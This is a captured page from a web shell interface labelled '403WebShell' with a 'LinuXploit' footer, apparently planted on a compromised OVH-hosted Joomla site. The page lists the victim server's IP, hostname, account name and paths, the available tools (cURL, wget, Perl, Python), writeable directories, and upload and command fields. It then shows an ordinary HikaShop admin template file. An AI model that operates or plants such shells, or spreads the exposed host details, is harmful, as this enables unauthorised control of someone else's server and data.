Done ! 403WebShell
403Webshell
Server IP : 46.105.57.169  /  Your IP : 216.73.216.67
Web Server : Apache
System : Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User : verseaumee ( 152031)
PHP Version : 8.5.7
Disable Function : _dyuweyrj4,_dyuweyrj4r,dl
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/verseaumee/zenit/administrator/components/com_hikashop/views/entry/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/verseaumee/zenit/administrator/components/com_hikashop/views/entry/tmpl/form.php
<?php
/**
 * @package	HikaShop for Joomla!
 * @version	4.5.1
 * @author	hikashop.com
 * @copyright	(C) 2010-2022 HIKARI SOFTWARE. All rights reserved.
 * @license	GNU/GPLv3 http://www.gnu.org/licenses/gpl-3.0.html
 */
defined('_JEXEC') or die('Restricted access');
?><?php if(hikaInput::get()->getVar('tmpl','')=='component'){ ?>
<h1><?php echo JText::_('HIKASHOP_ENTRY');?></h1>
<?php } ?>
<div id="hikashop_entry_form_span_iframe">
	<form action="<?php echo hikashop_completeLink('entry'); ?>" method="post"  name="adminForm" id="adminForm" enctype="multipart/form-data">
			<?php  if(hikaInput::get()->getVar('tmpl','')=='component'){ ?>
			<table>
			<?php }else{?>
			<table class="admintable table" width="700px" style="margin:auto">
			<?php
			}
			foreach($this->extraFields['entry'] as $fieldName => $oneExtraField) {
			?>
				<tr>
					<td class="key">
						<?php echo $this->fieldsClass->getFieldName($oneExtraField);?>
					</td>
					<td>
						<?php echo $this->fieldsClass->display($oneExtraField,@$this->entry->$fieldName,'data[entry]['.$fieldName.']',false,'',true); ?>
					</td>
				</tr>
			<?php }	?>
			</table>
		<input type="hidden" name="ctrl" value="entry"/>
		<?php if(hikaInput::get()->getVar('tmpl','')=='component'){ ?>
			<input type="hidden" name="task" value="save"/>
			<input type="hidden" name="tmpl" value="<?php echo hikaInput::get()->getVar('tmpl',''); ?>"/>
		<?php }else{ ?>
			<input type="hidden" name="task" value=""/>
		<?php } ?>
		<input type="hidden" name="data[entry][order_id]" value="<?php echo (int)@$this->entry->order_id;?>"/>
		<input type="hidden" name="data[entry][entry_id]" value="<?php echo (int)@$this->entry->entry_id;?>"/>

		<?php
		echo JHTML::_( 'form.token' );
		if(hikaInput::get()->getVar('tmpl','')=='component'){
			echo $this->cart->displayButton(JText::_('OK'),'ok',$this->params,hikashop_completeLink('entry&task=save'),'if(hikashopCheckChangeForm(\'entry\',\'adminForm\')) document.forms[\'adminForm\'].submit(); return false;','style="float:right"');
		}
		?>
	</form>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit